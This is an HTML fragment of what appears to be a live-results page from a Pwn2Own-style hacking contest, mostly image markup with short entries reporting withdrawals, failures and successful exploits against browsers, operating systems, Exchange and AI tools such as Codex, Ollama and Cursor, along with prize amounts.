                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a19a7651-9e6f-4b8a-ad30-dad57dbfc706/IMG_4236.png" data-image-dimensions="5712x4284" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a19a7651-9e6f-4b8a-ad30-dad57dbfc706/IMG_4236.png?format=1000w" width="5712" height="4284" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a19a7651-9e6f-4b8a-ad30-dad57dbfc706/IMG_4236.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a19a7651-9e6f-4b8a-ad30-dad57dbfc706/IMG_4236.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a19a7651-9e6f-4b8a-ad30-dad57dbfc706/IMG_4236.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a19a7651-9e6f-4b8a-ad30-dad57dbfc706/IMG_4236.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a19a7651-9e6f-4b8a-ad30-dad57dbfc706/IMG_4236.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a19a7651-9e6f-4b8a-ad30-dad57dbfc706/IMG_4236.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a19a7651-9e6f-4b8a-ad30-dad57dbfc706/IMG_4236.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/9cdb3ed4-80a2-4457-b853-7c84edd2a0da/Image.jpeg" data-image-dimensions="5184x3888" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/9cdb3ed4-80a2-4457-b853-7c84edd2a0da/Image.jpeg?format=1000w" width="5184" height="3888" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/9cdb3ed4-80a2-4457-b853-7c84edd2a0da/Image.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/9cdb3ed4-80a2-4457-b853-7c84edd2a0da/Image.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/9cdb3ed4-80a2-4457-b853-7c84edd2a0da/Image.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/9cdb3ed4-80a2-4457-b853-7c84edd2a0da/Image.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/9cdb3ed4-80a2-4457-b853-7c84edd2a0da/Image.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/9cdb3ed4-80a2-4457-b853-7c84edd2a0da/Image.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/9cdb3ed4-80a2-4457-b853-7c84edd2a0da/Image.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">WITHDRAWAL</b> - Kiyong Kwak of Kakaogames and Song Nuri of Samsung Electronics has withdrawn their entry for Apple Safari – Renderer Only in the Web Browser category.</p><p><b data-preserve-html-node="true">FAILURE</b> - Unfortunately, Ruitong of Abstract Team, University of Colorado Boulder could not get their exploit of Red Hat Enterprise Linux for Workstations working within the time allotted.</p><p><b data-preserve-html-node="true">SUCCESS</b> - Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) exploited OpenAI Codex in the second round, earning $20,000 and 4 Master of Pwn points.</p>











































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ca55907c-d67c-4831-ae12-2ae4486fa791/image+%282%29.jpeg" data-image-dimensions="2176x2901" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ca55907c-d67c-4831-ae12-2ae4486fa791/image+%282%29.jpeg?format=1000w" width="2176" height="2901" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ca55907c-d67c-4831-ae12-2ae4486fa791/image+%282%29.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ca55907c-d67c-4831-ae12-2ae4486fa791/image+%282%29.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ca55907c-d67c-4831-ae12-2ae4486fa791/image+%282%29.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ca55907c-d67c-4831-ae12-2ae4486fa791/image+%282%29.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ca55907c-d67c-4831-ae12-2ae4486fa791/image+%282%29.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ca55907c-d67c-4831-ae12-2ae4486fa791/image+%282%29.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/ca55907c-d67c-4831-ae12-2ae4486fa791/image+%282%29.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/09c209fd-7cc1-40c2-8427-0aac50dcfcbf/Image+%282%29.jpeg" data-image-dimensions="1024x768" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/09c209fd-7cc1-40c2-8427-0aac50dcfcbf/Image+%282%29.jpeg?format=1000w" width="1024" height="768" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/09c209fd-7cc1-40c2-8427-0aac50dcfcbf/Image+%282%29.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/09c209fd-7cc1-40c2-8427-0aac50dcfcbf/Image+%282%29.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/09c209fd-7cc1-40c2-8427-0aac50dcfcbf/Image+%282%29.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/09c209fd-7cc1-40c2-8427-0aac50dcfcbf/Image+%282%29.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/09c209fd-7cc1-40c2-8427-0aac50dcfcbf/Image+%282%29.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/09c209fd-7cc1-40c2-8427-0aac50dcfcbf/Image+%282%29.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/09c209fd-7cc1-40c2-8427-0aac50dcfcbf/Image+%282%29.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/af769f0a-c5e1-4570-beee-5f1db87a9454/Image+%283%29.jpeg" data-image-dimensions="1024x768" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/af769f0a-c5e1-4570-beee-5f1db87a9454/Image+%283%29.jpeg?format=1000w" width="1024" height="768" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/af769f0a-c5e1-4570-beee-5f1db87a9454/Image+%283%29.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/af769f0a-c5e1-4570-beee-5f1db87a9454/Image+%283%29.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/af769f0a-c5e1-4570-beee-5f1db87a9454/Image+%283%29.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/af769f0a-c5e1-4570-beee-5f1db87a9454/Image+%283%29.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/af769f0a-c5e1-4570-beee-5f1db87a9454/Image+%283%29.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/af769f0a-c5e1-4570-beee-5f1db87a9454/Image+%283%29.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/af769f0a-c5e1-4570-beee-5f1db87a9454/Image+%283%29.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">COLLISON</b> - Although successful on stage, Billy (@st424204), Bruce Chen (@bruce30262), Pan Zhenpeng (@Peterpan980927) &amp; Weiming Shi (@bestswngs) of STARLabs SG (@starlabs_sg) targeting NVIDIA Megatron Bridge used a bug that was previously known. They still earn $2,500 and 1 Master of Pwn point.</p>











































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/fb507189-35f2-4e9c-9c46-7bf038078824/Image+%283%29.jpeg" data-image-dimensions="4032x3024" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/fb507189-35f2-4e9c-9c46-7bf038078824/Image+%283%29.jpeg?format=1000w" width="4032" height="3024" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/fb507189-35f2-4e9c-9c46-7bf038078824/Image+%283%29.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/fb507189-35f2-4e9c-9c46-7bf038078824/Image+%283%29.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/fb507189-35f2-4e9c-9c46-7bf038078824/Image+%283%29.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/fb507189-35f2-4e9c-9c46-7bf038078824/Image+%283%29.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/fb507189-35f2-4e9c-9c46-7bf038078824/Image+%283%29.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/fb507189-35f2-4e9c-9c46-7bf038078824/Image+%283%29.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/fb507189-35f2-4e9c-9c46-7bf038078824/Image+%283%29.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b1fda10c-37fd-4f60-b976-3203f82cb19f/Image.jpeg" data-image-dimensions="1024x768" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b1fda10c-37fd-4f60-b976-3203f82cb19f/Image.jpeg?format=1000w" width="1024" height="768" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b1fda10c-37fd-4f60-b976-3203f82cb19f/Image.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b1fda10c-37fd-4f60-b976-3203f82cb19f/Image.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b1fda10c-37fd-4f60-b976-3203f82cb19f/Image.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b1fda10c-37fd-4f60-b976-3203f82cb19f/Image.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b1fda10c-37fd-4f60-b976-3203f82cb19f/Image.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b1fda10c-37fd-4f60-b976-3203f82cb19f/Image.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b1fda10c-37fd-4f60-b976-3203f82cb19f/Image.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">WITHDRAWAL</b> - Alon Ben Tsur (@iamgweej), Yahav Azran (@_yahav) have withdrawn their entry for Red Hat Enterprise Linux for Workstations in the Local Escalation of Privilege category.</p>
<p><b data-preserve-html-node="true">SUCCESS</b> - Orange Tsai (@orange_8361) of DEVCORE Research Team chained 3 bugs to achieve Remote Code Execution as SYSTEM on Microsoft Exchange, earning $200,000 and 20 Master of Pwn points.</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f109d155-65d6-4fc5-8573-a01bd108a4bf/Image+%2836%29.jpeg" data-image-dimensions="800x600" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f109d155-65d6-4fc5-8573-a01bd108a4bf/Image+%2836%29.jpeg?format=1000w" width="800" height="600" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f109d155-65d6-4fc5-8573-a01bd108a4bf/Image+%2836%29.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f109d155-65d6-4fc5-8573-a01bd108a4bf/Image+%2836%29.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f109d155-65d6-4fc5-8573-a01bd108a4bf/Image+%2836%29.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f109d155-65d6-4fc5-8573-a01bd108a4bf/Image+%2836%29.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f109d155-65d6-4fc5-8573-a01bd108a4bf/Image+%2836%29.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f109d155-65d6-4fc5-8573-a01bd108a4bf/Image+%2836%29.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f109d155-65d6-4fc5-8573-a01bd108a4bf/Image+%2836%29.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">SUCCESS</b> / <b data-preserve-html-node="true">COLLISON</b> - David Tae &amp; Louis Hur of Out Of Bounds targeted Ollama, hitting a one-vulnerability collision with a previous attempt and earning $28,000 and 3 Master of Pwn points.</p>











































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/40f65194-d6d9-4dad-b4ce-54bbba6cb2dc/IMG_3072.png" data-image-dimensions="4032x2268" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/40f65194-d6d9-4dad-b4ce-54bbba6cb2dc/IMG_3072.png?format=1000w" width="4032" height="2268" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/40f65194-d6d9-4dad-b4ce-54bbba6cb2dc/IMG_3072.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/40f65194-d6d9-4dad-b4ce-54bbba6cb2dc/IMG_3072.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/40f65194-d6d9-4dad-b4ce-54bbba6cb2dc/IMG_3072.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/40f65194-d6d9-4dad-b4ce-54bbba6cb2dc/IMG_3072.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/40f65194-d6d9-4dad-b4ce-54bbba6cb2dc/IMG_3072.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/40f65194-d6d9-4dad-b4ce-54bbba6cb2dc/IMG_3072.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/40f65194-d6d9-4dad-b4ce-54bbba6cb2dc/IMG_3072.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/306bb2af-89b2-4291-a4eb-adcbe98e5da3/Image.jpeg" data-image-dimensions="1024x768" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/306bb2af-89b2-4291-a4eb-adcbe98e5da3/Image.jpeg?format=1000w" width="1024" height="768" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/306bb2af-89b2-4291-a4eb-adcbe98e5da3/Image.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/306bb2af-89b2-4291-a4eb-adcbe98e5da3/Image.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/306bb2af-89b2-4291-a4eb-adcbe98e5da3/Image.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/306bb2af-89b2-4291-a4eb-adcbe98e5da3/Image.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/306bb2af-89b2-4291-a4eb-adcbe98e5da3/Image.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/306bb2af-89b2-4291-a4eb-adcbe98e5da3/Image.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/306bb2af-89b2-4291-a4eb-adcbe98e5da3/Image.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">FAILURE</b> - Nguyen Thanh Dat (@rewhiles) of Viettel Cyber Security (@vcslab) could not get their exploit of Mozilla Firefox – Renderer Only working within the time allotted.</p>
<p><b data-preserve-html-node="true">SUCCESS</b> - Cyrill Bannwart, Emanuele Barbeno, Yves Bieri, Lukasz D., Urs Mueller (@compasssecurity) of Compass Security exploited Cursor in the second round, earning $15,000 and 3 Master of Pwn points.</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b38cd173-9c13-4da7-9bf4-4125aa9a16e5/IMG_4249.png" data-image-dimensions="4032x3024" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b38cd173-9c13-4da7-9bf4-4125aa9a16e5/IMG_4249.png?format=1000w" width="4032" height="3024" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b38cd173-9c13-4da7-9bf4-4125aa9a16e5/IMG_4249.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b38cd173-9c13-4da7-9bf4-4125aa9a16e5/IMG_4249.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b38cd173-9c13-4da7-9bf4-4125aa9a16e5/IMG_4249.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b38cd173-9c13-4da7-9bf4-4125aa9a16e5/IMG_4249.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b38cd173-9c13-4da7-9bf4-4125aa9a16e5/IMG_4249.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b38cd173-9c13-4da7-9bf4-4125aa9a16e5/IMG_4249.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/b38cd173-9c13-4da7-9bf4-4125aa9a16e5/IMG_4249.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6a14f197-bfc7-4594-aff9-63262e5ecbe4/HIXuZHJW4AAgox8.jpeg" data-image-dimensions="1024x768" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6a14f197-bfc7-4594-aff9-63262e5ecbe4/HIXuZHJW4AAgox8.jpeg?format=1000w" width="1024" height="768" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6a14f197-bfc7-4594-aff9-63262e5ecbe4/HIXuZHJW4AAgox8.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6a14f197-bfc7-4594-aff9-63262e5ecbe4/HIXuZHJW4AAgox8.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6a14f197-bfc7-4594-aff9-63262e5ecbe4/HIXuZHJW4AAgox8.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6a14f197-bfc7-4594-aff9-63262e5ecbe4/HIXuZHJW4AAgox8.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6a14f197-bfc7-4594-aff9-63262e5ecbe4/HIXuZHJW4AAgox8.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6a14f197-bfc7-4594-aff9-63262e5ecbe4/HIXuZHJW4AAgox8.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/6a14f197-bfc7-4594-aff9-63262e5ecbe4/HIXuZHJW4AAgox8.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  













































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/60e31e50-84e7-4f4e-99a3-81cbba2df746/HIXuZHLX0AAzsn9.jpeg" data-image-dimensions="1024x768" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/60e31e50-84e7-4f4e-99a3-81cbba2df746/HIXuZHLX0AAzsn9.jpeg?format=1000w" width="1024" height="768" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/60e31e50-84e7-4f4e-99a3-81cbba2df746/HIXuZHLX0AAzsn9.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/60e31e50-84e7-4f4e-99a3-81cbba2df746/HIXuZHLX0AAzsn9.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/60e31e50-84e7-4f4e-99a3-81cbba2df746/HIXuZHLX0AAzsn9.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/60e31e50-84e7-4f4e-99a3-81cbba2df746/HIXuZHLX0AAzsn9.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/60e31e50-84e7-4f4e-99a3-81cbba2df746/HIXuZHLX0AAzsn9.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/60e31e50-84e7-4f4e-99a3-81cbba2df746/HIXuZHLX0AAzsn9.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/60e31e50-84e7-4f4e-99a3-81cbba2df746/HIXuZHLX0AAzsn9.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">SUCCESS</b> - Siyeon Wi used an integer overflow bug to escalate privileges on Microsoft Windows 11 in the fourth round, earning $7,500 and 3 Master of Pwn points.</p>











































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
